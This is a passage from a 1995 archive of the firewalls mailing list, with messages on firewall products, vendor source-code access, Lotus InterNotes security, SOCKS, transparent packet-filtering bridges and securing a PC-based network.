(8.6.9/Miles-950430-1) id IAA02890 for firewalls-outgoing; Mon, 1 May 1995 08:11:37 -0700 Received: from grauna.ax.apc.org ([200.18.178.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02883 for ; Mon, 1 May 1995 08:11:28 -0700 Received: from ax.ibase.org.br ([200.18.178.1]) by grauna.ax.apc.org (8.6.11/Revision: 1.58 ) with SMTP id MAA20773 for ; Mon, 1 May 1995 12:12:04 -0300 Received: (from uuboemia) by ax.ibase.org.br (8.6.11/Revision: 1.180 ) id MAA05512 for firewalls@greatcircle.com; Mon, 1 May 1995 12:06:28 -0300 From: Fernando Cabral To: njb@csehost.knoware.nl, firewalls@greatcircle.com Subject: Re: Firewalls mailing list in French: interest ? X-Mailer: ScoMail 1.0 Date: Mon, 1 May 1995 11:58:43 -0400 (BRA) Message-ID: <9505011158.aa12307@boemia.pix.com.br> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Niels wrote: [many paragraphs suppressed] >Alors, ne nous quittez pas, francophones. Ecrivez simplement en francais! > I agree with him in number, gender and grade. >Niels -fernando Fernando Cabral PADRAO iX Sistemas Abertos Ltda Solucoes de Informatica Caixa Postal 3541 70084-970 Brasilia-DF +55 61 274-6092 (voice) +55 61 274-5302 (fax) boemia!fernando@ibase.br From firewalls-owner Mon May 1 11:14:05 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04934 for firewalls-outgoing; Mon, 1 May 1995 09:36:06 -0700 Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA04929 for ; Mon, 1 May 1995 09:36:04 -0700 Received: from sgihub.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) for <@sgi.sgi.com:firewalls@greatcircle.com> id JAA25566; Mon, 1 May 1995 09:36:19 -0700 Received: from beyond.clubfed.sgi.com by sgihub.corp.sgi.com via ESMTP (950413.SGI.8.6.12/911001.SGI) for <@sgi.com:firewalls@greatcircle.com> id JAA12506; Mon, 1 May 1995 09:36:17 -0700 Received: from bruiser.clubfed.sgi.com by beyond.clubfed.sgi.com via ESMTP (940816.SGI.8.6.9/911001.SGI) for <@beyond.clubfed.sgi.com:firewalls@greatcircle.com> id MAA15644; Mon, 1 May 1995 12:45:01 -0400 Received: by bruiser.clubfed.sgi.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id MAA18935; Mon, 1 May 1995 12:44:59 -0400 From: "Kwesi O. Ames" Message-Id: <9505011244.ZM18933@bruiser.clubfed.sgi.com> Date: Mon, 1 May 1995 12:44:48 -0400 X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk unsubsribe -- ------------------------------------------------------------------ "Ask me a question, If I don't know the answer Come back tomorrow and I'll have the answer." ------------------------------------------------------------------ Kwesi '2 Trini' Ames | Internet: koa@clubfed.sgi.com Co-op Sys Admin | Phonenet: 301/572.3255 Silicon Graphics Inc. | Faxnet : 301/572.3280 Silver Spring, MD | Bayonet : Ouch!! ------------------------------------------------------------------ I speak for myself, not my employer. From firewalls-owner Mon May 1 11:17:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05228 for firewalls-outgoing; Mon, 1 May 1995 09:45:55 -0700 Received: from sg543689.eng.chrysler.com (sg543689.eng.chrysler.com [152.116.1.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA05223 for ; Mon, 1 May 1995 09:45:51 -0700 Received: from sg5382na.eng.chrysler.com (sg5382na.eng.chrysler.com [152.116.1.30]) by sg543689.eng.chrysler.com (8.6.10/8.6.9) with ESMTP id MAA25787 for ; Mon, 1 May 1995 12:46:11 -0400 Received: from clncrdv1.is.chrysler.com ([129.9.241.19]) by sg5382na.eng.chrysler.com (8.6.10/8.6.9) with SMTP id MAA18190 for ; Mon, 1 May 1995 12:48:27 -0400 Received: from bobsgrid.is.chrysler.com by clncrdv1.is.chrysler.com (4.1/SMI-4.1) id AA09817; Mon, 1 May 95 12:48:58 EDT Message-Id: <9505011648.AA09817@clncrdv1.is.chrysler.com> X-Sender: t3125rm@clncrdv1.is.chrysler.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 01 May 1995 12:45:38 -0400 To: doc@deathstar.lis.cch.com (Matthew J. D'Errico), auampwrv@ibmmail.com (Phil Daniels DLSPPJ - AMPLN1) From: chrysler-is-edi@is.chrysler.com (Robert Moskowitz) Subject: Re: LOTUS NOTES Cc: keithw@tp.com, firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:23 AM 5/1/95 -0400, Matthew J. D'Errico wrote: >There's been significant mis-information propagated by Lotus with regard to >"Firewall" facilities. I say misinformation because they imply very strongly >that InterNotes will act as a firewall for your Internet activities. >Outside of the obvious security walls between the Notes facilities and the >Internet, there's no proof,nor doumentation, that InterNotes will provide >the facilities of a good firewall outside of the Notes realm, i.e.: Bastion >Host, Packet Filtering, etc. Not only this... If you run this wonderful InterNotes on a UNIX host that is connected to the INTERNET and you have not secured said UNIX host, guess what? :( Also they have repeatedly presented me with blank looks every time I bring up a security audit of their CODE. Their reply is that their protocol is secure. :( I would have a perverted sense of gratification if a SATAN script could open up a UNIX host running only the NOTES code. Robert Moskowitz Chrysler Corporation (810) 758-8212 From firewalls-owner Mon May 1 11:36:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07023 for firewalls-outgoing; Mon, 1 May 1995 10:56:11 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA07018 for ; Mon, 1 May 1995 10:56:09 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQynwh27886; Mon, 1 May 1995 13:56:25 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA12126; Mon, 1 May 95 13:51:51 EDT Date: Mon, 1 May 1995 13:51:50 -0400 (EDT) From: Sick Puppy Subject: nuke vs firewalls To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to run nuke against a firewall and see what the firewall spits out. Unfortunately I don't have nuke. NASIRC knows where to find it but they won't tell. Can anyone tell me where to pick up a copy of nuke? Sick Puppy the Cat_Eating_Dawg U.S. Dept. of InJustice From firewalls-owner Mon May 1 11:39:36 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05503 for firewalls-outgoing; Mon, 1 May 1995 09:58:12 -0700 Received: from indy.knoware.nl (indy.knoware.nl [193.78.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA05497 for ; Mon, 1 May 1995 09:58:01 -0700 Received: from csehost.knoware.nl by indy.knoware.nl (5.64/A/UX-3.00) id AA23508; Mon, 1 May 95 18:01:57 WET DST Date: Mon, 1 May 95 18:01:57 WET DST Message-Id: <9505011701.AA23508@indy.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@greatcircle.com From: njb@csehost.knoware.nl (Niels Bjergstrom) Subject: New Internet Security Division X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk NEWS RELEASE - 1995.05.01 Computer Security Engineers, Ltd., today announced the formation of a new division of the company to provide Internet security related services and products in Europe. The new division will be headquartered in the UK and services provided through existing Support Centres in Denmark, Norway, Sweden, Germany, UK, Holland, Belgium and Hungary. Southern Europe will initially be serviced through CSE, Ltd. in the UK. CSE, Ltd., will provide turnkey firewall setups (hardware, software and expertise), risk analyses and security policies, remote firewall administration and for those who wish to perform their own firewalling, security auditing. The company is currently looking for a number of competent regional partners to distribute CSE products and services, especially in Southern Europe. - ------------------------------------------------------------------------ -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 534 7104 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- ------------------------------------------------------------------------ From firewalls-owner Mon May 1 13:42:28 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA09677 for firewalls-outgoing; Mon, 1 May 1995 12:27:43 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA09669 for ; Mon, 1 May 1995 12:27:34 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA04955; Mon, 1 May 95 14:59:21 -0400 Date: Mon, 1 May 95 14:59:21 -0400 Message-Id: <9505011859.AA04955@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Source Code Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank rites: >Even though we include source code with our distribution, I would not suggest >that anyone make changes. It gets real hard to try to support a product >and changes as well. I can not guarantee that any changes that are >made will work in the next version. This is the best choice IMNSHO. The code is there if necessary (and often is, cannot count the times I have had to make a vendor-suggested patch because the vendor could not duplicate the problem on their equipment), and available for examination (when I have made trouble calls, this has often enabled me to direct the vendor's attention to the specific module giving trouble. The point is that in a dynamic environment a customer may not be able to wait for the next version and at the same time, the vendor may not have the available resources (equipment and manpower) to be able to recreate it. Warmly, Padgett From firewalls-owner Mon May 1 13:47:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10579 for firewalls-outgoing; Mon, 1 May 1995 13:00:29 -0700 Received: from sstcx1.lanl.gov (sstcx1.lanl.gov [128.165.207.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA10574 for ; Mon, 1 May 1995 13:00:26 -0700 Received: (from dneal@localhost) by sstcx1.lanl.gov (8.6.10/8.6.9) id OAA26109 for firewalls@GreatCircle.COM; Mon, 1 May 1995 14:00:45 -0600 Date: Mon, 1 May 1995 14:00:45 -0600 From: David Neal Message-Id: <199505012000.OAA26109@sstcx1.lanl.gov> To: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk unsubsribe From firewalls-owner Mon May 1 13:56:33 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10101 for firewalls-outgoing; Mon, 1 May 1995 12:45:14 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10095 for ; Mon, 1 May 1995 12:45:12 -0700 Received: from Disclosure.COM by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id MAA02154; Mon, 1 May 1995 12:44:15 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA11751; Mon, 1 May 95 15:45:36 EDT Date: Mon, 1 May 1995 15:45:35 -0400 (EDT) From: Scott Barman To: Bob McKisson Cc: ted@gw.lsli.com, Firewalls@greatcircle.com Subject: RE: TRUST US In-Reply-To: <9504291846.AA00533@sandfiddler.paragon-systems.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 29 Apr 1995, Bob McKisson wrote: > Clue; Would you spend years of effort building a company, investing > time and huge stacks of cash, yours and others, to develop a quality > software product that the marketplace is telling you that it very much > wants and needs, and then give it all away? The GNU Project? The Open Software Foundation? Oh... but they don't give it away, but they do license it! scott barman scott@disclosure.com (I speak for nobody but myself... sometimes badly!! :-) From firewalls-owner Mon May 1 15:30:48 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13180 for firewalls-outgoing; Mon, 1 May 1995 14:14:53 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA13154 for ; Mon, 1 May 1995 14:14:12 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA13297 for ; Mon, 1 May 1995 16:15:17 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 172420000; 1 May 95 17:14 CDT Received: from sctc.com by sccmailhost.sctc.com id 154770000; 1 May 95 17:13 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id QAA29409; Mon, 1 May 1995 16:13:46 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA17297; Mon, 1 May 1995 16:13:44 -0500 Date: Mon, 1 May 1995 16:13:44 -0500 From: Rick Smith Message-Id: <199505012113.QAA17297@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: some remarks on the source and what it buys you - Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding: >THIS IS WHAT I WANT: Let me get the code under NDA. If you are a real >manufacturer, you won't mind giving me your test results and explaining >precisely how your system works. Build your lower level simply; create a >higher level architecture for me to become familiar with. And please, >please, don't waste my time. There is one more question to ask: how well does the vendor's bugfixing and revision management work? In other words, does the vendor track bug fixing, associate fixes with releases, and exercise a reasonable measure of review and control over their code? What about regression testing? If there isn't much control over the revision process, then it's a waste of time to review their code, since there's nothing that controls what it'll look like the next time they update it. A cadre of True Paraniods in the military INFOSEC community had once proposed that high security systems should comply with the strategic defense system's requirements for high assurance software. That required that you use (nonexistent) high assurance software tools to implement high assurance operating systems to host those tools on. But besides that, it also required QA things like source code control, change reviews, regression testing, etc. We dropped some of the more esoteric assurance requirements when doing Sidewinder (i.e. no mathematical specifications), but we still do configuration management and bug tracking and release control. This is what responsible engineering is all about. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Mon May 1 15:39:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15212 for firewalls-outgoing; Mon, 1 May 1995 15:15:13 -0700 Received: from teal.csn.org (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA15207 for ; Mon, 1 May 1995 15:15:09 -0700 Received: by teal.csn.org id AA19834 (5.65c/IDA-1.5 for Firewalls@GreatCircle.COM); Mon, 1 May 1995 16:15:30 -0600 Date: Mon, 1 May 1995 16:15:30 -0600 From: Scott Surguine Message-Id: <199505012215.AA19834@teal.csn.org> To: Firewalls@greatcircle.com Subject: TIS and other "Off The Shelf Packages" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings Folks: I am currently interested in knowledge of TIS & Other packages that are currently available on the market. Where might I get a list of such information? TIA, Scott A. Surguine surguine@csn.org From firewalls-owner Mon May 1 16:13:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15711 for firewalls-outgoing; Mon, 1 May 1995 15:31:41 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA15703 for ; Mon, 1 May 1995 15:31:38 -0700 Received: from gateway.sctc.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id PAA02883; Mon, 1 May 1995 15:30:33 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id RAA14151 for ; Mon, 1 May 1995 17:30:37 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 178580000; 1 May 95 18:29 CDT Received: from sctc.com by sccmailhost.sctc.com id 159870000; 1 May 95 18:29 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id RAA01319; Mon, 1 May 1995 17:29:22 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA19042; Mon, 1 May 1995 17:29:21 -0500 From: Rick Smith Message-Id: <199505012229.RAA19042@shade.sctc.com> Subject: Re: TRUST US and other hooui To: firewalls@greatcircle.com Date: Mon, 1 May 1995 17:29:21 -0500 (CDT) Cc: Rick Smith X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2231 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank Wortner says: >> ... how could we be expected to support a product when we don't know >> what changes to the code the customer has made? >A problem, but one that is hardly unique to your product, or in fact to >the computer industry. For example, automobile owners often modify cars >and add or change numerous accessories, and dealers and mechanics manage >to survive. The main difference seems to be the intangible nature of >software versus other products --- it's easy to see the aftermarket >stereo in a car, but harder to notice the rebuilt RPC library. I think the problem with software is that the side effects of changes are much, much harder to predict and control. People can install aftermarket stereos because cars and stereos have reached a level of technological maturity in which *most* of the problems have been anticipated and designed out of this scenario. A properly installed stereo isn't going to blow the fuses or drain the battery. Also, the most likely failure modes decrease your enjoyment of your car but are unlikely to risk your life and safety. On the other hand, there is No Way to anticipate the side effects of arbitrary changes to source code, especially in security software. In fact, history has shown that it's much easier to implement software with security flaws than without security flaws, even when security is your objective. If you're making these changes as an independent third party with no involvement in the software's design, you run an even better chance of trampling on some key assumption and opening a hole. The original purpose of type enforcement was to so restrict the behavior of separate software components that we could easily analyze their behavior and do formal models of each component. We don't do that on Sidewinder, but we do use type enforcement to restrict process behavior (like chroot, but more flexibly and thoroughly). In practice we use this to restrict the potential risks of installing the latest "improved" version of sendmail, though someday we'll probably use it to allow controlled local modifications, too. Rick. smith@sctc.com roseville, minnesota From firewalls-owner Mon May 1 16:39:54 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17148 for firewalls-outgoing; Mon, 1 May 1995 16:11:05 -0700 Received: from BCSC02.GOV.BC.CA (BCSC02.GOV.BC.CA [142.32.161.61]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17139 for ; Mon, 1 May 1995 16:11:00 -0700 Message-Id: <199505012311.QAA17139@miles.greatcircle.com> Received: from BCSC02.GOV.BC.CA by BCSC02.GOV.BC.CA (IBM VM SMTP V2R2) with BSMTP id 0204; Mon, 01 May 95 16:13:54 PDT Date: Mon, 1 May 95 16:13:54 PDT From: "Sam van der Merwe" To: Firewalls@GreatCircle.COM Subject: Novell FTP - Need a Firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: FIREWA1 --INTERNET Firewalls@GreatCir I have an IBM mainframe that is going to transfer a file daily to a Novell(4.1 LAN. After some work is done on the LAN an updated file will be transferred back to the mainframe to be used as input to a batch job. Because we have a TCP/IP network I want to use FTP to tranfer the file up and down. This process will have to be automated as the file transfer could take place at any time in the day.There is a CIsco router on the Lan side. What I would like to know:- If I fire up an FTP server with NO anonymous FTP are there any security implications I should worry about? - we currently use the same network to access the Internet. Assume no security exists around this FTP server or the process currently. Sam van der Merwe Senior Security Supervisor Information Technology Division, Motor Vehicle Branch Phone: 356-5281 INTERNET: SSVANDER@BCSC02.GOV.BC.CA From firewalls-owner Mon May 1 17:09:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18785 for firewalls-outgoing; Mon, 1 May 1995 17:00:19 -0700 Received: from wyrm.cc.uow.edu.au (wyrm.cc.uow.edu.au [130.130.68.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18774 for ; Mon, 1 May 1995 17:00:14 -0700 Received: from wumpus.cc.uow.edu.au (wumpus [130.130.68.6]) by wyrm.cc.uow.edu.au (8.6.11/8.6.11) with ESMTP id JAA18896 for ; Tue, 2 May 1995 09:57:13 +1000 From: LEI YI T Received: (tyl11@localhost) by wumpus.cc.uow.edu.au (8.6.9/8.6.4) id JAA09064 for firewalls@GreatCircle.COM; Tue, 2 May 1995 09:57:11 +1000 Message-Id: <199505012357.JAA09064@wumpus.cc.uow.edu.au> Subject: What's about SOCKS?? To: firewalls@GreatCircle.COM Date: Tue, 2 May 1995 09:57:10 +1000 (EST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 420 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk G'day all, I have installed the TIS's firewall into our system ( Solaris x86 PC with 2 ethernet interfaces ). Everything seems working fine, and we want to configure transparent control of services (eg telnet ) between two networks. We belive SOCKS does this, Can anyone tell me about SOCKS and where to find it or anything else does the same thing. Thanks in advance, Yitao tyl11@wumpus.uow.edu.au From firewalls-owner Mon May 1 21:13:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA23488 for firewalls-outgoing; Mon, 1 May 1995 21:01:59 -0700 Received: from UABDPO.DPO.UAB.EDU (UABDPO.DPO.UAB.EDU [138.26.1.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA23483 for ; Mon, 1 May 1995 21:01:55 -0700 Message-Id: <199505020401.VAA23483@miles.greatcircle.com> Received: from [164.111.129.58] by UABDPO.DPO.UAB.EDU (IBM VM SMTP V2R2) with TCP; Mon, 01 May 95 23:02:21 CDT Date: Mon, 1 May 1995 23:14:30 -0600 To: firewalls@greatcircle.com From: usts062@maze.dpo.uab.edu (Christopher Smith) X-Sender: usts062@uabdpo.dpo.uab.edu Subject: Re: some remarks on the source and what it buys you - Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 4:13 PM 5/1/95 -0500, Rick Smith wrote: >There is one more question to ask: how well does the vendor's >bugfixing and revision management work? In other words, does the >vendor track bug fixing, associate fixes with releases, and exercise a >reasonable measure of review and control over their code? What >A cadre of True Paraniods in the military INFOSEC community had once >proposed that high security systems should comply with the strategic >defense system's requirements for high assurance software. That >required that you use (nonexistent) high assurance software tools to >implement high assurance operating systems to host those tools on. But >besides that, it also required QA things like source code control, >change reviews, regression testing, etc. Does this mean that for these guys, everything had to be assured? Instead of falling back on a simplistic well-defined layer, they used the brute force approach? How was sidewinder structured? From firewalls-owner Tue May 2 04:09:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA02038 for firewalls-outgoing; Tue, 2 May 1995 03:50:57 -0700 Received: from chx400.switch.ch (chx400.switch.ch [130.59.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA02025 for ; Tue, 2 May 1995 03:50:39 -0700 Received: from arwen.unibe.ch by chx400.switch.ch with SMTP (PP); Tue, 2 May 1995 12:50:34 +0200 From: greulich@math-stat.unibe.ch (Andreas Greulich) Message-Id: <9505021050.AA02076@grimsel> Subject: completely transparent filtering device? To: firewalls@greatcircle.com Date: Tue, 2 May 1995 12:50:27 +0200 (MET DST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 4384 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all! We got a problem concerning a packet-filtering device. There's a subnet connected to our TCP-IP based network that wants to protect from our network. The best thing of course would be a firewall, the easiest thing a packet-filtering router (only packet-filtering would actually be needed in the given situation). The subnet is connected to the main network via a router administered by us. The problem is that most technical good/feasible solutions are impossible for political reasons: - Adding access lists to the existing router isn't acceptable for them (they don't trust us to set up the rules correctly). - Adding a second router between our router and their subnet isn't acceptable to us (or, let's say, to the people that take care of the network) with the (admittedly stupid) argumentation they won't assign a new subnet (the subnet between the two routers). Don't ask me why not, there are no technical, but just political reasons speaking against it. They just won't do it. I see two solutions for the moment (not that the subnet isn't partitioned, ie no further routers are in it, it is just bridged): 1 Using a standard firewall with the existing router as screening router (this would allow to set up easy rules and maybe that's acceptable to them, it also splits configuration between router and firewall). 2 Actually only packet filtering would be required, not the full overhead of a firewall. Hence we thought about a 2-port machine that's put on the wire between our router and their network, but without ANY routing features. If no subnet has to be assigned between router and this device, the arguument given above wouldn't work anymore. The first solution surely is feasible. My question aims at the second solution. What I look for is a device that actually has none of its two ip interfaces configured to an ip address or subnet or anything like this; this device would just receive ethernet frames from one side, send it thru some filtering mechanism, and based upon a yes-no decision sends it unchanged to the other interface, and vice versa. This way it would be completely invisible. It would also (assuming the filtering rules allow that) let ARP/RARP packets and the like pass unchanged. To make this work, it would have to be able to send out ethernet frames with ethernet addresses different from his own one (ie spoof them, which usually isn't possible). I don't think such a device or program exists? If so, I'd like to know about it... What would technically be possible though is a device that deals with ARP/RARP specifically, because a device usually can only use it's real ethernet address as source ethernet address. To make the transparent setup work, it would have to do Proxy-Arps on behalf of all directly connected devices on either side of the machine. That would be easy, it just had to reply any ARP request with its own ethernet address (as no diskless clients are booted over this router, it is ok not to translate RARPs, but of course this could also be done using fix tables). If ARP is dealt wih like this, it would for example be possible writing a program that runs the interfaces in promisc mode, say on a sun using the nit interface, and just copy packets from one to the other interface and vice versa (with the filter in between). It wouldn't even be needed to have the interfaces set up to correct addresses, as nit doesn't use them. But, such a program would be slow (maybe faster using dpli...). Does such a program (but faster, maybe in kernel) exist for some hardware, or maybe some hardware devices? The important thing is, it has to be transparent, no need to set up subnets, and the like... it seems like a terribly easy thing, but of course "too easy" if one has to deal with the overhead of an operating system like unix on top... Thanks for your help in advance, Andy -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Andreas Greulich University of Berne, Switzerland ---------------- Email: greulich@math-stat.unibe.ch, greulich@iam.unibe.ch http://grimsel.unibe.ch/~greulich CIS: 100014,1033 Phone home: (+41 31) 961 7031 Phone office: (+41 31) 631 8809, (+41 31) 631 4869 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Tue May 2 05:08:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA03748 for firewalls-outgoing; Tue, 2 May 1995 04:50:49 -0700 Received: from sg543689.eng.chrysler.com (sg543689.eng.chrysler.com [152.116.1.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA03733 for ; Tue, 2 May 1995 04:50:40 -0700 Received: from sg5382na.eng.chrysler.com (sg5382na.eng.chrysler.com [152.116.1.30]) by sg543689.eng.chrysler.com (8.6.10/8.6.9) with ESMTP id HAA19157 for ; Tue, 2 May 1995 07:50:59 -0400 Received: from clncrdv1.is.chrysler.com ([129.9.241.19]) by sg5382na.eng.chrysler.com (8.6.10/8.6.9) with SMTP id HAA21083 for ; Tue, 2 May 1995 07:53:43 -0400 Received: from bobsgrid.is.chrysler.com by clncrdv1.is.chrysler.com (4.1/SMI-4.1) id AA18907; Tue, 2 May 95 07:53:59 EDT Message-Id: <9505021153.AA18907@clncrdv1.is.chrysler.com> X-Sender: t3125rm@clncrdv1.is.chrysler.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 May 1995 07:50:41 -0400 To: Carl Jolley , "Bryan D. Boyle" From: rgm3@is.chrysler.com (Robert Moskowitz) Subject: Re: Re:TRUST US Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:31 AM 4/28/95 -0400, Carl Jolley wrote: > >I once asked the Technical Support Manager of a data center what his >disaster recovery plan for his data center was and he told me that his >disaster recover plan was: if a disaster occurred, he would turn in his >resignation. His logic was that the risk of getting hit by a disaster >was low but the probability of him having to do a lot of work to develop >the plan was high, so.... In today's DP world, he could be criminally cuppable for his former employee's business failure. Think about that one... Robert Moskowitz Chrysler Corporation (810) 758-8212 From firewalls-owner Tue May 2 07:19:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA06583 for firewalls-outgoing; Tue, 2 May 1995 06:13:43 -0700 Received: from wpgwy.eiknes.se. ([193.12.168.124]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA06578 for ; Tue, 2 May 1995 06:13:34 -0700 Received: from EIKNES-Message_Server by wpgwy.eiknes.se. with Novell_GroupWise; Tue, 02 May 1995 15:15:40 +0200 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 02 May 1995 14:44:14 +0200 From: Patrik Andreasen To: Firewalls@greatcircle.com Subject: Securing PC based site Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Securing PC based site I'm in the process of evaluating the security of, and proposing changes to, the protective measures at a mainly PC-based network company that is inexperienced with dealing with the Internet. Most of the users are on Novell NetWare-connected PCs, with the network connected to the internet. However, there are a few hosts on the net that offer services to the outside world. These include: a Windows NT ftp server with logins for an (relatively large) number of paying subscribers the same NT box also runs a WWW server a PC runnig a SMTP <-> GroupWise mail gateway a UnixWare host running DNS and telnet First, I would suppose that putting IP on the PCs wouldnt in it self be a significant security risk, since they would be used solely as clients to various WWW servers around the net. The use of any server-software on a PC would not be supported in the security policy. Second, the mail gateway seems to be pretty safe, since it runs DOS and can only talk to the GroupWise post office. Still, the usual troubles with mailbombs and suchlike is still a threat. NT box is a big questionmark. Does anyone have experience with NT as a 3W and FTP server? Is it 